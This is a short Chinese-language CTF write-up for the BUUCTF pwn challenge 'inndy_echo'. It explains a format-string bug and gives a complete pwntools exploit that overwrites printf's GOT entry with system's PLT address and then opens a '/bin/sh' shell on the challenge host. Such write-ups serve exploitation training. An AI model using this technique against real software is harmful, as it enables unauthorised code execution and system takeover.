[BUUCTF-pwn]——inndy_echo
有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。
从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。
先找找偏移 7
exploit
from pwn import *
p = remote("node3.buuoj.cn",28268)
#p = process("./echo")
#gdb.attach(p, "b printf")
offest = 7
printf_got = 0x0804A010
sys = 0x08048400
#payload = fmtstr_payload(7, {printf_got:sys})
#上面那个payload可以,直接用的pwntools提供的一个函数。
#下面是我自己写的,两个都可以。建议大家多用用下面的方法,
#因为64位这个函数,有时因为\x00截断不管用
#多写写也可以训练一下。
payload = "%19$hhn%4c%20$hhn%4c%21$hhn%124c%22$hhn"
payload = payload.ljust(0x30, 'a')
payload += p32(printf_got) + p32(printf_got+2) + p32(printf_got+3) + p32(printf_got+1)
print(payload)
p.sendline(payload)
sleep(0.2)
p.sendline('/bin/sh\x00')
p.interactive()